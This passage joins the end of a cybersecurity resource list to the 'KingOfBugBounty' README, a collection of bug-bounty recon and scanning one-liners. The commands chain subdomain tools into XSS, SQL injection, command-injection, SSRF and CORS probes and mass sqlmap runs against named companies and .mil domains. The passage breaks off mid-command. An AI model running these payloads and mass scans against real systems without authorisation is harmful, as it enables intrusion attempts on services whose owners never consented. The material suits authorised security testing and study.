of topics ## Communities and Conferences: * [Defcon](https://www.defcon.org/) one of the largest worldwide Hacking conferences in the world * [Blackhat](https://blackhat.com/) large worldwide conference all over the globe * [RSA Conference](https://www.rsaconference.com/) The RSA Conference is an annual event focused on helping improve cybersecurity awareness and cybersecurity culture in companies, and similarly expanding this knowledge in individuals across the globe. * [Calendar for Information Security Conferences](https://www.google.com/calendar/[email protected]&gsessionid=OK) ## Blogs, Wikis, Magazines, and Forums ### Blogs * [McGrew Security](http://www.mcgrewsecurity.com/) * [GNUCITIZEN](http://www.gnucitizen.org) * [Darknet - The Darkside](http://www.darknet.org.uk/) ### Forums: Created for forums that will help in both tool usage, syntax, attack techniques, and collection of scripts and tools. * [EH-Net Forums](https://www.ethicalhacker.net/forums/index.php) * [Hak5 Forums](https://forums.hak5.org/) * [Kali Linux Forums](https://forums.kali.org/) * [Hack Forums](http://www.hackforums.net/) * [Hackthissite Forums](http://www.hackthissite.org/forums/index.php) * [Security Override Forums](http://securityoverride.com/forum/index.php) * [Government Security](http://www.governmentsecurity.org/forum/) ### Wikis * [Pwn Wiki](http://pwnwiki.io/) * [Skull Security](https://wiki.skullsecurity.org/) * [BlindSeeker Wiki](https://www.blindseeker.com) * [SQL Injection Wiki](http://www.sqlinjectionwiki.com/) * [Forgotten Security's CTF Wiki](http://ctf.forgottensec.com/wiki/index.php) ### Magazines: * [(In)Secure Magazine](http://www.net-security.org/insecuremag.php) * [Hackin9](http://hakin9.org/) ## Security Research * [https://www.shodan.io/](https://www.shodan.io/): network monitoring and analytics platform. * [https://www.exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database) google search term exploit database * [http://www.exploit-db.com/](http://www.exploit-db.com/): exploited and vulnerable software vulnerabilities database. * [http://www.cvedetails.com/](http://www.cvedetails.com/): comprehensive database of security vulnerabilities. * [https://cxsecurity.com/](https://cxsecurity.com/): security vulnerability database. * [http://www.packetstormsecurity.org/](http://www.packetstormsecurity.org/): security attack and audit sources. * [http://www.securityforest.com/wiki/index.php/Main_Page](http://www.securityforest.com/wiki/index.php/Main_Page): security and penetration testing tips. * [http://www.securityfocus.com/bid](http://www.securityfocus.com/bid): Bugtraq discussion forum & vulnerability tracking system. * [http://nvd.nist.gov/](http://nvd.nist.gov/): U.S. National Vulnerability Database. * [http://osvdb.org/](http://osvdb.org/): open source vulnerability database. * [http://www.nullbyte.org.il/Index.html](http://www.nullbyte.org.il/Index.html): cyber security and hacking website. * [http://secdocs.lonerunners.net/](http://secdocs.lonerunners.net/): security document search engine. * [http://www.phenoelit-us.org/whatSAP/index.html](http://www.phenoelit-us.org/whatSAP/index.html): SAP security exploit database. * [http://secunia.com/](http://secunia.com/): online IT security vulnerability resource. * [http://cve.mitre.org/](http://cve.mitre.org/): database of publicly known security vulnerabilities ## Glossary - [Sans Glossary of Security Terms](https://www.sans.org/security-resources/glossary-of-terms/) - [NICCS glossary of terms](https://niccs.cisa.gov/cybersecurity-career-resources/vocabulary) - [NIST Glossary](https://csrc.nist.gov/glossary) - [Common Security Acronyms](https://getcertified.ecpi.edu/wp-content/uploads/2018/02/CompTIA-SecurityPlus-Acronyms.pdf) - [Skillsoft list](https://www.globalknowledge.com/us-en/topics/cybersecurity/glossary-of-terms/) - For more terms see [Cybersecurity ventures article](https://cybersecurityventures.com/cybersecurity-glossary/) ## Contributions Special thanks to all the contributors who have helped compile and curate this comprehensive list of resources. Your valuable contributions have made this collection possible and will undoubtedly assist many in their pursuit of knowledge and understanding in the world of cybersecurity and information technology. Together, we strive to improve and share knowledge, making the digital landscape safer for all. In no particular order thank you * [theo2612](https://github.com/theo2612) * butterfly Discord id butterfly6 * [xsudoxx](https://github.com/xsudoxx/OSCP)
<h1 align="center"> ๐Ÿ‘‘ What is KingOfBugBounty Project </h1> Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. ๐Ÿ‘‘ ## Stats King ![OFJAAAH](https://github-readme-stats.vercel.app/api?username=KingOfBugbounty&show_icons=true&theme=dracula) [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=703ff752fd6f&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) <div> <a href="https://www.linkedin.com/in/atjunior/"><img src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"></img></a> <a href="https://www.youtube.com/c/OFJAAAH"><img src="https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white"></a> </div> ## BugBuntu Download - [BugBuntu](https://sourceforge.net/projects/bugbuntu/) - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) ## Special thanks - [@bt0s3c](https://twitter.com/bt0s3c) - [@MrCl0wnLab](https://twitter.com/MrCl0wnLab) - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) - [@wellpunk](https://twitter.com/wellpunk) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Amass](https://github.com/OWASP/Amass) - [Anew](https://github.com/tomnomnom/anew) - [Anti-burl](https://github.com/tomnomnom/hacks/tree/master/anti-burl) - [Assetfinder](https://github.com/tomnomnom/assetfinder) - [Airixss](https://github.com/ferreiraklet/airixss) - [Axiom](https://github.com/pry0cc/axiom) - [Bhedak](https://github.com/R0X4R/bhedak) - [CF-check](https://github.com/dwisiswant0/cf-check) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Cariddi](https://github.com/edoardottt/cariddi) - [Dalfox](https://github.com/hahwul/dalfox) - [DNSgen](https://github.com/ProjectAnte/dnsgen) - [Filter-resolved](https://github.com/tomnomnom/hacks/tree/master/filter-resolved) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Fuff](https://github.com/ffuf/ffuf) - [Freq](https://github.com/takshal/freq) - [Gargs](https://github.com/brentp/gargs) - [Gau](https://github.com/lc/gau) - [Gf](https://github.com/tomnomnom/gf) - [Github-Search](https://github.com/gwen001/github-search) - [Gospider](https://github.com/jaeles-project/gospider) - [Gowitness](https://github.com/sensepost/gowitness) - [Goop](https://github.com/deletescape/goop) - [GetJS](https://github.com/003random/getJS) - [Hakrawler](https://github.com/hakluke/hakrawler) - [HakrevDNS](https://github.com/hakluke/hakrevdns) - [Haktldextract](https://github.com/hakluke/haktldextract) - [Haklistgen](https://github.com/hakluke/haklistgen) - [Html-tool](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Jsubfinder](https://github.com/ThreatUnkown/jsubfinder) - [Kxss](https://github.com/Emoe/kxss) - [Knoxss](https://knoxss.me/) - [LinkFinder](https://github.com/GerbenJavado/LinkFinder) - [log4j-scan](https://github.com/fullhunt/log4j-scan) - [Metabigor](https://github.com/j3ssie/metabigor) - [MassDNS](https://github.com/blechschmidt/massdns) - [Naabu](https://github.com/projectdiscovery/naabu) - [Notify](https://github.com/projectdiscovery/notify) - [Paramspider](https://github.com/devanshbatham/ParamSpider) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Rush](https://github.com/shenwei356/rush) - [SecretFinder](https://github.com/m4ll0k/SecretFinder) - [Shodan](https://help.shodan.io/command-line-interface/0-installation) - [ShuffleDNS](https://github.com/projectdiscovery/shuffledns) - [SQLMap](https://github.com/sqlmapproject/sqlmap) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [SubJS](https://github.com/lc/subjs) - [Unew](https://github.com/dwisiswant0/unew) - [Unfurl](https://github.com/tomnomnom/unfurl) - [Urldedupe](https://github.com/ameenmaali/urldedupe) - [WaybackURLs](https://github.com/tomnomnom/waybackurls) - [Wingman](https://xsswingman.com/#faq) - [Goop](https://github.com/deletescape/goop) - [Tojson](https://github.com/tomnomnom/hacks/tree/master/tojson) - [X8](https://github.com/Sh1Yo/x8) - [XSStrike](https://github.com/s0md3v/XSStrike) - [Page-fetch](https://github.com/detectify/page-fetch) ### BBRF SCOPE DoD ```bash bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Scan All domains using Knoxss - [Explained command] ```bash echo "dominio" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh ``` ### Scan All github repo ORG - [Explained command] ```bash docker run --rm mswell/masstrufflehog -o paypal ``` ### Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### SSTI in qsreplase add "{{7*7}}" (0xJin) ```bash cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace โ€œaaa%20%7C%7C%20id%3B%20xโ€ > fuzzing.txt ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` ### urldedupe bhedak - [Explained command] ```bash waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Hakrawler Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" ``` ### FREQ XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not' ``` ### Bhedak - [Explained command] ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command] ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command] ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command] ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command] ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command] ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command] ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command] ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command] ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command] ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command] ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command] ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command] ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command] ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command] ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command] ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command] ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command] ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command] ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command] ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command] ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command] ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command] ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command] Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command] ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command] Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesnโ€™t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command] We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command] Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search] Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command] ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command] ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command] ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command] ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command] ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command] ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command] ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command] ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command] Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command] echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command] ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command] To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command] ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command] ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command] ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command] ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command] ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command] ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command] ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command] ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command] ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command] ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command] ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command] ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command] ```bash cat 